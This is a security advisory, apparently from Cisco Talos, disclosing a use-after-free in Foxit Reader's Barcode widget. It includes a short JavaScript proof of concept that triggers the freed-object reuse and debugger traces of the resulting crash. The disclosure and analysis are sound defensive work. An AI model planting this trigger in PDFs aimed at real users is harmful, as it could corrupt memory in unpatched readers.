Talos Vulnerability Report

TALOS-2024-1958

Foxit Reader Barcode widget Calculate event use-after-free vulnerability

April 30, 2024
CVE Number

CVE-2024-25938

SUMMARY

A use-after-free vulnerability exists in the way Foxit Reader 2024.1.0.23997 handles a Barcode widget. A specially crafted JavaScript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 2024.1.0.23997

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a Barcode object. This can be illustrated by the following proof-of-concept code:

function main() { 

    getField('Barcode Field0').setAction("Calculate",'delete_pages();'); 

    app.activeDocs[0].getField('Barcode Field0').buttonSetIcon( );  

}

function delete_pages() { 
    app.activeDocs[0].deletePages();
    app.activeDocs[0].deletePages();

}

The above code simply assigns a callback function to the Barcode Calculate for the field Barcode Field0, which is promptly triggered by the second call to getField . In the action callback, all that happens is a call to deletePages, which in turn ends up freeing all the objects associated with a page. The use-after-free vulnerability occurs when a Barcode object is freed by deletePages() and is used without any validation. We can observe the following in the debugger (with PageHeap enabled):

0:000> g
eax=072fe130 ebx=072fe19c ecx=029940a0 edx=00000002 esi=12f4cb88 edi=12f4cb48
eip=02cd56e9 esp=072fe108 ebp=072fe148 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x11f9270 (029940a0)} 
0:000> g
eax=00d7f9a0 ebx=072fe19c ecx=12f53500 edx=046b9308 esi=12f4cb88 edi=12f4cb48
eip=029bbb4d esp=072fdea4 ebp=072fdf4c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!safe_vsnprintf+0x1220d1d:
029bbb4d ffd0            call    eax {FoxitPDFReader!CryptUIWizExport+0x36b20 (00d7f9a0)}
0:000> g
in   javascript::Field::UpdateFormField
eax=00d7f9a0 ebx=072fe19c ecx=12f53500 edx=046b9308 esi=12f4cb88 edi=12f4cb48
eip=029bbb4d esp=072fdea4 ebp=072fdf4c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!safe_vsnprintf+0x1220d1d:
029bbb4d ffd0            call    eax {FoxitPDFReader!CryptUIWizExport+0x36b20 (00d7f9a0)}
0:000> g
eax=072fd698 ebx=072fd704 ecx=02904f80 edx=00000002 esi=1029b318 edi=12ff2a58
eip=02cd56e9 esp=072fd670 ebp=072fd6b0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02904f80)} ; <------ (1)
0:000> g
ModLoad: 695d0000 69927000   C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\plugins\PDFAccessibility.fpi
eax=072fd698 ebx=072fd704 ecx=02904f80 edx=00000002 esi=10b39840 edi=10b39800
eip=02cd56e9 esp=072fd670 ebp=072fd6b0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02904f80)} ; <------ (2)
0:000> g
eax=072fafa8 ebx=132feb6c ecx=132fe9b0 edx=07111000 esi=132feb68 edi=12fdb7b0
eip=005aad36 esp=072fafcc ebp=072fd3f4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb886:
005aad36 8b01            mov     eax,dword ptr [ecx]  ds:002b:132fe9b0=0472e794
0:000> dd ecx                                                                 ;<--------------- (3)
132fe9b0  0472e794 132fea50 186d2520 12d6c488
132fe9c0  e0e0e000 00000001 10b9c9e8 01000101
132fe9d0  00000004 00000000 132fea90 00000000
132fe9e0  10b9c944 135b0a40 0f5fd160 00000001
132fe9f0  00000000 00000000 00000000 00000000
132fea00  00000000 e0e0e001 00000000 12f53500
132fea10  00000000 a0a0a0a0 a0a0a0a0 f0f0f0f0
132fea20  00000000 00000000 86981040 10770152
0:000> p
eax=0472e794 ebx=132feb6c ecx=132fe9b0 edx=07111000 esi=132feb68 edi=12fdb7b0
eip=005aad38 esp=072fafcc ebp=072fd3f4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb888:
005aad38 6a01            push    1
0:000> p
eax=0472e794 ebx=132feb6c ecx=132fe9b0 edx=07111000 esi=132feb68 edi=12fdb7b0
eip=005aad3a esp=072fafc8 ebp=072fd3f4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb88a:
005aad3a ff5004          call    dword ptr [eax+4]    ds:002b:0472e798=0174e360 ; <------ (4)
0:000> p
eax=132fe9b0 ebx=132feb6c ecx=132fe9b0 edx=00000001 esi=132feb68 edi=12fdb7b0
eip=005aad3d esp=072fafcc ebp=072fd3f4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb88d:
005aad3d 83c604          add     esi,4                      
0:000> dd ecx                                                                  ; <------ (5)     
132fe9b0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fe9c0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fe9d0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fe9e0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fe9f0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fea00  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fea10  f0f0f0f0 a0a0a0a0 a0a0a0a0 f0f0f0f0
132fea20  00000000 00000000 86981040 10770152

At [1] and [2] above, the javascript::CFXJS_Document::deletePages_static method associated with the JavaScript API deletePages() is called. The second call to the deletePages_static() method calls the destructor method of the CBF_Widget class at [4]. This destructor call frees the vulnerable CBF_Widgetobject. The value of the vulnerable CBF_Widget object is examined at [3] and [5]. It shows the value before and after the destructor method is called. The vulnerable CBF_Widget object is a type of Barcode object, which is later used without any validation. This can be observed in a debugger at the time of the crash:

0:000> g
eax=ffffffff ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=135b0a40 edi=0472e16c
eip=0174914c esp=072fde24 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4ffe9c:
0174914c c20800          ret     8
0:000> t
eax=ffffffff ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=135b0a40 edi=0472e16c
eip=01758f54 esp=072fde30 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fca4:
01758f54 8b7334          mov     esi,dword ptr [ebx+34h] ds:002b:132fe9e4=f0f0f0f0
0:000> p
eax=ffffffff ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f57 esp=072fde30 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fca7:
01758f57 8d4350          lea     eax,[ebx+50h]
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f5a esp=072fde30 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcaa:
01758f5a 50              push    eax
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f5b esp=072fde2c ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcab:
01758f5b ff7510          push    dword ptr [ebp+10h]  ss:002b:072fde90=00000001
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f5e esp=072fde28 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcae:
01758f5e 8bcb            mov     ecx,ebx
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f60 esp=072fde28 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcb0:
01758f60 c70000000000    mov     dword ptr [eax],0    ds:002b:132fea00=f0f0f0f0
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f66 esp=072fde28 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcb6:
01758f66 ff75e8          push    dword ptr [ebp-18h]  ss:002b:072fde68=186ce020
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f69 esp=072fde24 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcb9:
01758f69 e8920546ff      call    FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf0 (00bb9500) <----- (6)
0:000> t
eax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9500 esp=072fde20 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf0:
00bb9500 8b410c          mov     eax,dword ptr [ecx+0Ch] ds:002b:132fe9bc=f0f0f0f0 ; <--------------- (7)
0:000> p
eax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9503 esp=072fde20 ebp=072fde80 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf3:
00bb9503 85c0            test    eax,eax
0:000> p
eax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9505 esp=072fde20 ebp=072fde80 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf5:
00bb9505 7403            je      FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddfa (00bb950a) [br=0]
0:000> p
eax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9507 esp=072fde20 ebp=072fde80 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7:
00bb9507 8b00            mov     eax,dword ptr [eax]  ds:002b:f0f0f0f0=???????? ; <--------------- (8)
0:000> p
(167c.41c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9507 esp=072fde20 ebp=072fde80 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210286
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7:
00bb9507 8b00            mov     eax,dword ptr [eax]  ds:002b:f0f0f0f0=????????

0:000> u
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7:
00bb9507 8b00            mov     eax,dword ptr [eax]
00bb9509 c3              ret
00bb950a 33c0            xor     eax,eax
00bb950c c3              ret
00bb950d cc              int     3
00bb950e cc              int     3
00bb950f cc              int     3
00bb9510 51              push    ecx


0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 072fde80 01758785     00000000 00000000 00000001 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7
01 072fde9c 029bbb4f     00000000 00000000 00000001 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50f4d5
02 072fdf4c 029c3b3c     13055370 186ce110 00000000 FoxitPDFReader!safe_vsnprintf+0x1220d1f
03 072fe060 02994349     12f4cb48 072fe128 072fe0a8 FoxitPDFReader!safe_vsnprintf+0x1228d0c
04 072fe100 02cd56eb     12f4cb48 072fe130 072fe128 FoxitPDFReader!safe_vsnprintf+0x11f9519
05 072fe148 02eb9a6b     131bed70 18dad269 131bed70 FoxitPDFReader!FXJSE_GetClass+0x26b
06 072fe1b0 02eb922e     072fe1f8 18dad269 072fe2d4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3cab
07 072fe244 02eb94e5     072fe274 131bed70 072fe2d4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e346e
08 072fe28c 02eb936b     072fe2a4 00000007 072fe2e8 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3725
09 072fe2a8 030db17b     00000007 072fe2e8 131bed70 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e35ab
0a 072fe2c8 030771d9     00082339 18dadb6d 0000000e FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4053bb
0b 072fe310 030771d9     18dbeb6d 18f51dc9 18f51e1d FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
0c 072fe33c 03075860     18dbeb6d 000821b1 18f51dc9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
0d 072fe354 03075689     00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39faa0
0e 072fe380 02d11f4e     131bed70 00082339 18f51dc9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39f8c9
0f 072fe490 02d11a42     072fe624 131bed70 072fe4ec FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
10 072fe518 02cfa744     072fe624 131bed70 15a824c4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc82
11 072fe6c8 02cfa240     072fe764 15a824ec 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24984
12 072fe6dc 02cd3c5f     072fe764 15a824ec 3d298585 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24480
13 072fe754 02cd4596     15a824c4 15a823d0 15a824b0 FoxitPDFReader!FXJSE_Runtime_Release+0xeaf
14 072fe790 02878af7     15826350 186b928c 15a823d0 FoxitPDFReader!FXJSE_ExecuteScript+0x86
15 072fe848 0287a129     00000000 072fe8d8 072fe880 FoxitPDFReader!safe_vsnprintf+0x10ddcc7
16 072fe860 00bb20df     072fe8d8 072fe880 3d298a41 FoxitPDFReader!safe_vsnprintf+0x10df2f9
17 072fe890 00bb0fa4     15825e28 00000015 072fe8b8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c69cf
18 072fe8d0 00baf9d0     186da020 1315e280 10bf3bc8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c5894
19 072fe924 0049d322     072fe954 1315e280 10bf3bc8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c42c0
1a 072fe974 0071901b     00000000 3d299749 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x8852
1b 072ff598 03cb9713     00000000 00000000 3d2994b9 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x6194b
1c 072ff668 03cba8ec     00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x199cc3
1d 072ff68c 03cb5292     00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x19ae9c
1e 072ff700 03cb5b05     13076098 000d02c2 00000429 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x195842
1f 072ff720 750c120b     000d02c2 00000429 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1960b5
20 072ff74c 750b81ca     03cb5ad1 000d02c2 00000429 USER32!AddClipboardFormatListener+0x4b
21 072ff830 750b5f2a     03cb5ad1 00000000 00000429 USER32!GetClassLongW+0x7ba
22 072ff8a4 750b5cf0     00000329 072ff8cc 0069f324 USER32!DispatchMessageW+0x24a
23 072ff8b0 0069f324     0c3c8fe8 0c3c8fe8 057d98e8 USER32!DispatchMessageW+0x10
24 072ff8cc 0069f3e3     057d98e8 0069f350 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dfe74
25 072ff8ec 040e29c2     00000000 0580550c 0710e000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dff33
26 072ff904 03e9cef1     00250000 00000000 0c3653c4 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5c2f72
27 072ff950 76ddfcc9     0710e000 76ddfcb0 072ff9bc FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x37d4a1
28 072ff960 77247c6e     0710e000 8017ce93 00000000 KERNEL32!BaseThreadInitThunk+0x19
29 072ff9bc 77247c3e     ffffffff 77268c33 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0x11e
2a 072ff9cc 00000000     03e9cfc0 0710e000 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xee

At [6] above, the vulnerable CBF_Widget object calls the CBA_Annot::GetPage method. In CBA_Annot::GetPage(), the vulnerable freed CBF_Widget object is dereferenced at [7]. This directly leads to a use-after-free condition and results in a crash. Depending on the memory layout of the process, it may be possible to do arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.

VENDOR RESPONSE

The vendor has provided updated versions

TIMELINE

2024-04-01 - Vendor Disclosure
2024-04-28 - Vendor Patch Release
2024-04-30 - Public Release

Credit

Discovered by KPC of Cisco Talos.